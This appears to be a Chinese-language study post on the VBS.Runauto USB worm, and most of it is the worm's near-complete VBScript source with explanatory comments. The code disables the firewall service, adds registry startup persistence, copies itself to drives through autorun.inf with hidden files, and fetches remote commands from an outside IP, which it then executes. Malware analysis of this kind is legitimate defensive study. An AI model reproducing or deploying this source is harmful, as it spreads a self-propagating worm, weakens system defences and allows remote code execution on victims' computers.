VBS.Runauto脚本病毒是我们俗称的U盘病毒的一种,Symantec公司给其定位为蠕虫(Worm)病毒,虽然危害性远不如一些恶性病毒,但常常会严重影响用户正常使用计算机。
脚本概览
源码分析
由于在网上找了很久也没有找到该病毒的样本,只能参考网上的分析文章中所公布出来的源码进行分析,意在分析病毒的大体函数调用,作学习之用。
On Error Resume Next
Set fso=CreateObject("scripting.filesystemobject")
Set wshshell=CreateObject(strreverse("wscript.shell"))
Dim dri_list,dri_list0
Dim issend
issend=0
c_time=Date()
' 这是关闭SharedAccess(Intemet连接共享和防火墙服务)'
wshshell.run "net stop sharedaccess",0
Set drvs=fso.drives
sysdir=fso.GetSpecialFolder(1)
'WindowsFolder=0,SystemFolder=1, TemporaryFolder=2 '
thispath=wscript.ScriptFullName
Set fc=fso.OpenTextFile(thispath,1)
'ForReading=1,ForWriting=2 ,ForAppending=8 '
scopy=fc.readall
fc.Close
Set fc=Nothing
' 写注册表注册文件sysinfo.reg,注册系统开机自动执行病毒 '
Call writefile(sysdir&"\sysinfo.reg","windows registry editor version 5.00 [hkey_local_machine\software\policies\microsoft\windows\system\scripts\startup\0\0] "script"="%windir%\\system32\\prncfg.vbs" "parameters"="" "exectime"=hex(b):00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 [hkey_local_machine\software\microsoft\windows\currentversion\group policy\state\machine\scripts\startup\0\0] "script"="%windir%\\system32\\prncfg.vbs" "parameters"="" "exectime"=hex(b):00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
")
' 导入注册表sysinfo.reg '
wshshell.run "regedit /s sysinfo.reg" , 0
wscript.sleep 200
fso.deletefile sysdir&"\sysinfo.reg" , True
' 如果当前运行脚本在系统目录中'
If InStr(thispath,sysdir)>0 Then
dri_list0=listdrv()
o_time=left(c_time,3)&cstr(Int(Mid(c_time,4,1))-1)&Right(c_time,Len(c_time)-4)
'回拨时间1年 '
wshshell.run "cmd /c Date" &o_time,0
wscript.sleep 10000
For dri_i=1 to Len(dri_list0)
Call writeauto(Mid(dri_list0,dri_i,1)& ":\" )
Next
wshshell.run "cmd /c Date "&c_time,0
'WMI应用查询计算机名,用户名'
computername="":username=""
Set objwmiservice=GetObject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
Set colcomputers = objwmiservice.execquery("select * from win32_computersystem")
For Each objcomputer in colcomputers
computername=objcomputer.name
username=objcomputer.username
Next
If username="" Then username="evar"
If InStr(username,"\")<=0 Then
username=computername&"\"&username
End If
do
If issend=0 Then
' 链接外网,获得执行代码
Set xml=CreateObject("msxml2.serverxmlhttp")
xml.open "get","http://202.119.104.100/zzb/eva/count.asp?a="&username,0
' http://202.119.104.100/zzb/是南师大学校党委组织部主办的网站
xml.setrequestheader "user-agent","evar"
xml.send()
If Err.number=0 Then
issend=1
res=xml.responsetext
If ucase(left(res,7))=ucase("Execute") Then Execute res
Else
Err.clear
End If
Set xml=Nothing
End If
dri_list=listdrv()
For dri_k=1 to Len(dri_list)
If InStr(dri_list0,Mid(dri_list,dri_k,1))<=0 Then
Call writeauto(Mid(dri_list,dri_k,1)&":\")
End If
Next
dri_list0=dri_list
wscript.sleep 1000
loop
Else
wshshell.run "explorer .\",3
wscript.sleep 2000
wshshell.appactivate LCase("我的电脑")
wshshell.sendkeys UCase("% c") ' 模拟击键 alt + space + c ,其实就是关闭窗口
runflag=0
' 获得当前系统进程,WMI的应用
For each ps in GetObject _
("winmgmts:\\.\root\cimv2:win32_process").instances_
If lcase(ps.name)=lcase("wscript.exe") Then
runflag=runflag+1
End If
Next
If runflag>=2 Then wscript.quit
Set sf=fso.GetFolder(sysdir)
f_time=Left(sf.datecreated,InStr(sf.datecreated," ")-1)
wshshell.run "cmd /c Date "&f_time,0
wscript.sleep 100
Call writefile(sysdir&lcase("\prncfg.vbs"),vs(scopy))
wshshell.run "cmd /c Date "&c_time,0
wshshell.run sysdir&"\prncfg.vbs"
End If
' 混乱字符串,进行代码变体!
Function vs(str)
Execute "For i=1 to Len(str) c=ucase(Mid(str,i,1)) randomize If Int(rnd()*100)>50 Then vs=vs&lcase(c) Else vs=vs&c End If Next vs=replace(vs,ucase("%u"),lcase("%u"))"
End Function
' 列出驱动器
Function listdrv()
Execute "Dim tmp_list tmp_list="" For each drv in drvs If drv.isready Then tmp_list=tmp_list&drv.driveletter End If Next listdrv=tmp_list"
End Function
' 写autorun.inf文件
Sub writeauto(path)
' 写Auto文件前的准备,如果path中有autorun.inf文件夹那么重命名;如果有autorun.inf文件则删除
Execute "If fso.folderexists(path&"autorun.inf") Then fso.movefolder path&"autorun.inf",path&rnd() elseif fso.fileexists(path&"autorun.inf") Then fso.deletefile path&"autorun.inf",true End If"
' autorun.inf中的启动代码
cmdstr="shell\*\command=wscript.exe "&chr(34)&"eva.vbs"&chr(34)
autostr="[autorun]"&vbcrlf&"open="&vbcrlf&replace(cmdstr,"*","open")&vbcrlf&replace(cmdstr,"*","explore")&vbcrlf&replace(cmdstr,"*","find")
' 写入
Call writefile(path&ucase("autorun.inf"),autostr)
Call writefile(path&"eva.vbs",vs(scopy))
End Sub
'将content中的内容写入fpath,并设置文件属性是ReadOnly、Hidden和System
Sub writefile(fpath,content)
Execute "If fso.fileexists(fpath) Then fso.deletefile fpath,true Set fc=fso.OpenTextFile(fpath,2,true) fc.write content fc.Close Set fc=Nothing Set fa=fso.getfile(fpath) fa.attributes=7 Set fa=Nothing"
End Sub